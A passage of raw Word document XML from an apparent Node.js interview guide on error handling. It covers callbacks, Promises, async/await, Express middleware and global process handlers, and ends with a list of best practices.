          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Debugging and Maintenance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Clear and informative error messages and logs make it easier to identify and fix issues during development and maintenance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE25CA5" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="561"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Proper error handling prevents the exposure of sensitive information and mitigates potential security vulnerabilities by ensuring that error details are not exposed to end users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0903C1" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error Handling Mechanisms in Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE1C679" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Error Handling in Callbacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6987F51C" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In Node.js, many asynchronous operations use callbacks, which typically follow the "error-first" convention. This means the first argument of the callback is an error object (if an error occurs), and the subsequent arguments are the result of the operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A37B34"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1FBA4B0A"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48DD8D9B"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fs.readFile('file.txt', (err, data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768E5E61"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC79EBB"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console.error('An error occurred:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B215090"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281C7BFB"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7CD1397"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content:', data.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417565AA"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FCA147B" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Error Handling in Promises</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168097D7" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When using Promises, errors can be handled using the .catch() method. Promises provide a more readable way to handle asynchronous operations and errors compared to callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EDF8D6"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require('fs').promises;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046FFAD2"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6F5EBEE"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fs.readFile('file.txt')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3368F8A8"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.then(data =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D180DC9"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content:', data.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED5C02B"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93A1DE4"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.catch(err =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75999FCC"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console.error('An error occurred:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21944B80"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512120AD" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. Error Handling with Async/Await</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEF6902" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>async/await syntax allows for a more synchronous-like code structure when working with asynchronous operations. Errors in async/await functions can be handled using try/catch blocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22645332"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require('fs').promises;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD872B6"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3B5B03E"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readFile() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C372BBE"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B95DD30"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data = await fs.readFile('file.txt');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5320A7"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content:', data.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03187293"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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF024F4"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console.error('An error occurred:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C67D49"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7C11F6E"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6DF847F"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7EAC531"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readFile();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449BC676" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4. Error Handling in Express.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271978A8" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In Express.js, error handling is typically done using middleware functions. The error-handling middleware function takes four arguments: err, req, res, and next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27591A69"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2056EB10"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41849224"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5E733F1"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 (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C05541"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throw new Error('Something went wrong');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A937B00"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6E2876A"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B71D43B"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Error-handling middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E7DCD7"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420FCBE5"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console.error(err.stack);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730DD4F9"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res.status(500).send('Something broke!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B04AEA"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A36F9F5"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A1FE4BA"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app.listen(3000, () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54967A4D"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console.log('Server running on port 3000');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDEC7CC"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CA39F33" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5. Global Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1F22F2" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Global error handling is used to catch unhandled errors in the application. In Node.js, you can handle uncaught exceptions and unhandled promise rejections globally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4DC01D"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Handle uncaught exceptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CFEEA2"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process.on('uncaughtException', (err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44026503"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console.error('Uncaught Exception:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEA0BB8"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Perform cleanup or logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD058CC"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 // Exit the process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EB8AD7"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53A0FFB"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F83DAAA"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Handle unhandled promise rejections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5068745D"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process.on('unhandledRejection', (reason, promise) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5244EDFF"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console.error('Unhandled Rejection at:', promise, 'reason:', reason);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396B4427"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Perform cleanup or logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632250F3" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD"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68870BD" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Best Practices for Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B59E32B" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="562"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Handle Errors Gracefully</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Provide meaningful error messages to users and avoid exposing internal details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326CC0AA" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="562"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Consistent Error Formats</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Standardize error responses to make it easier to handle errors in client applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1127FDA5" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="562"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Log Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement logging for errors to facilitate debugging and monitoring. Use logging libraries like winston or bunyan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463A6C25" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="562"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Test Error Scenarios</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Test error handling scenarios to ensure that the application behaves as expected in the face of errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A53B30A" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="562"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoid Swallowing Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Do not suppress errors silently; ensure that all errors are properly handled and logged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08085A2E" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="562"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Clean Up Resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure resources like file handles and database connections are properly closed in the event of an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F506B1C" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="394B20F9" w14:textId="0339BDC5" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="163" w:name="_Toc178383345"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How do you handle errors in asynchronous code in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="163"/>
    </w:p>
    <w:p w14:paraId="7A6D130F" w14:textId="77777777" w:rsidR="00B3502A" w:rsidRPr="00DA2F32" w:rsidRDefault="00B3502A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Handling errors in asynchronous code in Node.js is crucial for maintaining application stability and providing a good user experience. Here's a detailed look at various methods for managing errors in asynchronous operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45812647"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1. Callback-Based Asynchronous Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A64724" w14:textId="77777777" w:rsidR="00B3502A" w:rsidRPr="00DA2F32" w:rsidRDefault="00B3502A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In Node.js, many asynchronous operations use callbacks. The error-first callback pattern (also known as "error-back" or "Node.js callback style") is common.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3403DF49"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5E13C1D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36FF4398"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9D101CC"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Asynchronous function with error-first callback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623ED84F"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fs.readFile('file.txt', (err, data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFD2971"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2B8641"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Handle error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CA39E9"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console.error('An error occurred:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471C98BB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1C05CB"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116F7A3"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Process data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49271F93"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content:', data.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF331C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18CA78CA"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2. Promises</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A88A5D7" w14:textId="77777777" w:rsidR="00B3502A" w:rsidRPr="00DA2F32" w:rsidRDefault="00B3502A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Promises provide a more manageable approach to handling asynchronous operations compared to callbacks. Promises use .then() for success and .catch() for errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574EF562"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3586A5A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require('fs').promises;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098CCE7C"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9DA18FA"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Asynchronous function with Promises</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFD15EC"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fs.readFile('file.txt')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3ED62E"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.then(data =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAB5537"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Process data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F0E2CB"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content:', data.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323947FC"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A8B57E6"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.catch(err =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB80C17"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Handle error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B499A8"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console.error('An error occurred:', err);</w:t>
      </w:r>
    </w:p>
